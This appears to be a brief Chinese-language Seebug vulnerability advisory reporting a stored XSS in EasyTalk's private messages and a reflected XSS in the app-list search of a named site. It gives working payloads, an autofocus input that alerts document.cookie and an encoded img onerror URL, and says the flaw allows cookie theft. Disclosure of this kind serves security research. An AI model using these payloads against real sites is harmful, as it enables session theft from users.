easytalk一处指哪打哪XSS

2013-12-29T00:00:00
ID SSV:96020
Type seebug
Reporter Root
Modified 2013-12-29T00:00:00

Description

简要描述:

详细说明:

XSS发生在私信 输入XSS代码:<input onfocus=alert(document.cookie) autofocus>

<img src="https://images.seebug.org/upload/201310/12223754fd1afa98f3d978b1ce4edc815eec6579.jpg" alt="0001.jpg" width="600" onerror="javascript:errimg(this);">

即可触发,盗取cookie

漏洞证明:

顺便再送个反射形 http://www.hahawb.cn/?m=app&a=applist&keyword=%22%3E%3Cimg%20src=1%20onerror=%22alert%281%29%22/%3E